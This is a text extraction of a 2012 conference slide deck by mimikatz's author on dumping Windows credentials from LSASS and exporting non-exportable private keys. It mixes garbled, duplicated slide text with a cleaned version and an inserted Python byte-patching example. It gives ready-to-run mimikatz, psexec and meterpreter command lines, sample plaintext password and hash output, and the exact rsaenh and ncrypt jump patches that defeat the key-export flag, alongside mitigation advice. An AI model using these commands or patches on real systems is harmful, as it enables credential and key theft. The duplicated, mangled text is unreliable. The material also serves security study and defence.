(IV)    lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsa: memo
Some commands
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp :
	 * n.t. (LUID KO)
mimikatz sekurlsa: what we can do
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (...)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz crypto: how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
Callouts: Constraint for most users / Unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
– cryptdll.dll, rsaenh.dll, ...
The process deals with cryptographic keys through this API...
mimikatz crypto capi: how it's exported (PLAYSKOOL level)
[Diagram] Process (CryptoAPI and RSA CSP): Ask to export Key -> Load Private Key -> DPAPI Decode -> Exportable? -> yes: Exported Key / no: NTE_BAD_KEY_STATE
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (KeyIso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys
[user]
CNG keys
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportable : NO
        Key size   : 2048
        Private export to "cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk" : KO – mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029, NTE_NOT_SUPPORTED) The requested operation is not supported.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
Before (ncrypt, inside LSASS):
  .text:6C815210  75 1C    jnz short continue_key_export
After (one byte changed, 75 → EB; same length, same target):
  .text:6C815210  EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (huh?) – certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch (same command, same certificate):
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo
Some commands:
  mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
  mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password – PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it? • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts / computer – no admin, no admin, no admin…
Basics
– Use smartcards / tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: memo
Security Packages (where each SSP keeps its logon sessions inside LSASS)
  Package          Symbol                                                    Type
  tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                                     LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount    LIST_ENTRY / ULONG
Protection Keys (what LSASS uses to encrypt those secrets in memory)
  Key     NT 5 symbols
  RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback
  Key     NT 6 symbols
  IV      lsasrv!InitializationVector
  3DES    lsasrv!h3DesKey
  AES     lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
  mimikatz "privilege::debug" "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request for SeDebugPrivilege ACTIVATION: OK

mimikatz # sekurlsa::logonPasswords full
Authentication Id      : 0;234870
Authentication package : NTLM
Principal user         : Gentil Kiwi
Authentication domain  : vm-w8-rp-x
        msv1_0 :   User : Gentil Kiwi   Domain : vm-w8-rp-x
                   LM hash   : d0e9aee149655a6075e4540af1f22d3b
                   NTLM hash : cc36cf7a8514893efccd332446158b1a
        kerberos : User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
        wdigest :  User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
        tspkg :    User : Gentil Kiwi   Domain : vm-w8-rp-x   Password : waza1234
        livessp :  nt (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts: network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys, in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI, in mimikatz context
  • CNG, in LSASS context (again ;))
(diagram: mod_mimikatz_crypto)
mimikatz :: crypto :: how it's protected?
Private keys are DPAPI protected – You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened) – Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password (a constraint for most users; unavailable for computer keys, which have no interactive session)
– Popup (same constraint; unavailable for computer keys)
– Export/Archive flag not present
Importing with the export flag off, with the default provider or with a chosen CSP:
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API… inside their own address space.
mimikatz :: crypto :: capi :: how it's exported (… level)
[Flow diagram (stamped "PLAYSKOOL"), rendered as text:]
  Process – CryptoAPI and RSA CSP (loaded in the process itself)
  "Ask to export key" → DPAPI decode → Load private key → Exportable?
    yes → Exported key
    no  → NTE_BAD_KEY_STATE
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), the call goes to rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportCertificates
Location: CERT_SYSTEM_STORE_CURRENT_USER/My
 - Benjamin Delpy
        Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportable    : NO
        Key size      : 2048
        Private export to "CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx" : KO (0x8009000b, NTE_BAD_KEY_STATE) Key not valid for use in specified state.
        Public export to "CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der" : OK

certutil, same certificate:
================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process tells me I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space…
Before (rsaenh, two exportability checks):
  .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
  .text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
After (each 6-byte jnz rel32 becomes nop + 5-byte jmp rel32; 2 bytes changed per site, displacement untouched):
  .text:0AC0B7CB  90                   nop
  .text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive
  .text:0AC1F749  90                   nop
  .text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
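The rsaenh patch here and the ncrypt patch on the patchcng slides are the same trick: the "is this key exportable?" branch is turned into an unconditional jump without moving a single byte of anything else. The example below was written for this edit (it is not mimikatz code) and works on byte strings instead of a live process: it decodes the bytes from the listings at the addresses the listings give, rewrites them the way the slides do, and checks that the branch target does not change. It also shows why the 6-byte form has to be `90 E9 rel32` and not `E9 rel32 90`: an x86 rel32 displacement is relative to the end of the jmp, so the nop must come first to keep that end at the same address. Only the listed addresses and bytes are used; nothing about the live DLLs is assumed.

```python
from dataclasses import dataclass

MASK32 = 0xFFFFFFFF


@dataclass
class Jump:
    addr: int            # address of the first byte of the encoding (a leading nop included)
    length: int          # bytes consumed
    unconditional: bool  # jmp (True) or jnz (False)
    target: int          # absolute branch target computed from the displacement


def decode_jump(addr: int, code: bytes) -> Jump:
    """Decode an x86 jnz/jmp (rel8 or rel32) at `addr`, optionally preceded by one nop."""
    if code[0] == 0x90:                                  # nop: the real branch starts one byte later
        inner = decode_jump(addr + 1, code[1:])
        return Jump(addr, inner.length + 1, inner.unconditional, inner.target)
    if code[0] in (0x75, 0xEB):                          # 75 rel8 = jnz short, EB rel8 = jmp short
        rel = int.from_bytes(code[1:2], "little", signed=True)
        return Jump(addr, 2, code[0] == 0xEB, (addr + 2 + rel) & MASK32)
    if code[0] == 0xE9:                                  # E9 rel32 = jmp near
        rel = int.from_bytes(code[1:5], "little", signed=True)
        return Jump(addr, 5, True, (addr + 5 + rel) & MASK32)
    if code[:2] == b"\x0f\x85":                          # 0F 85 rel32 = jnz near
        rel = int.from_bytes(code[2:6], "little", signed=True)
        return Jump(addr, 6, False, (addr + 6 + rel) & MASK32)
    raise ValueError("unsupported encoding: %s" % code[:6].hex())


def force_jump(code: bytes) -> bytes:
    """Rewrite a jnz into an always-taken jmp of identical length, keeping the displacement bytes."""
    if code[0] == 0x75:                                  # patchcng: 1 byte changes, 75 -> EB
        return b"\xeb" + code[1:2]
    if code[:2] == b"\x0f\x85":                          # patchcapi: 2 bytes change, 0F 85 -> 90 E9
        return b"\x90\xe9" + code[2:6]                   # nop FIRST so the jmp still ends at addr+6
    raise ValueError("not a jnz")


def patch_image(image: bytes, offset: int) -> bytes:
    """Apply force_jump at `offset` inside a code buffer (the bytes a WriteProcessMemory would change)."""
    n = 2 if image[offset] == 0x75 else 6
    return image[:offset] + force_jump(image[offset:offset + n]) + image[offset + n:]


def targets_preserved(addr: int, original: bytes) -> bool:
    """The property both patches rely on: same length, same target, only the condition is gone."""
    before = decode_jump(addr, original)
    after = decode_jump(addr, force_jump(original))
    return (before.target == after.target and before.length == after.length
            and not before.unconditional and after.unconditional)


def wrong_variant_target(addr: int, original: bytes) -> int:
    """What E9 rel32 90 (nop last) would do: the jmp ends one byte early and lands one byte short."""
    return decode_jump(addr, b"\xe9" + original[2:6] + b"\x90").target


# Constructed samples: the three sites from the slide listings (rsaenh above, ncrypt on the patchcng slide).
SITES = {
    "rsaenh_export":  (0x0AC0B7CB, bytes.fromhex("0f8533c7ffff")),
    "rsaenh_prepare": (0x0AC1F749, bytes.fromhex("0f85b63bffff")),
    "ncrypt_export":  (0x6C815210, bytes.fromhex("751c")),
}

if __name__ == "__main__":
    for name, (addr, code) in SITES.items():
        j = decode_jump(addr, code)
        print(f"{name}: {code.hex()} -> {force_jump(code).hex()}  "
              f"target {j.target:#010x}  preserved={targets_preserved(addr, code)}")
```

The same length-and-target check is a cheap integrity test for the other direction: reading those six bytes back out of a running LSASS and finding `90 E9` (or `EB` at the ncrypt site) where the on-disk DLL has `0F 85` / `75` is exactly the in-memory footprint the "bonus" slide describes, and it survives until the KeyIso service restarts.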
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations
Because
– I'm lazy
– In the majority of real-life cases I've seen RSA keys • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
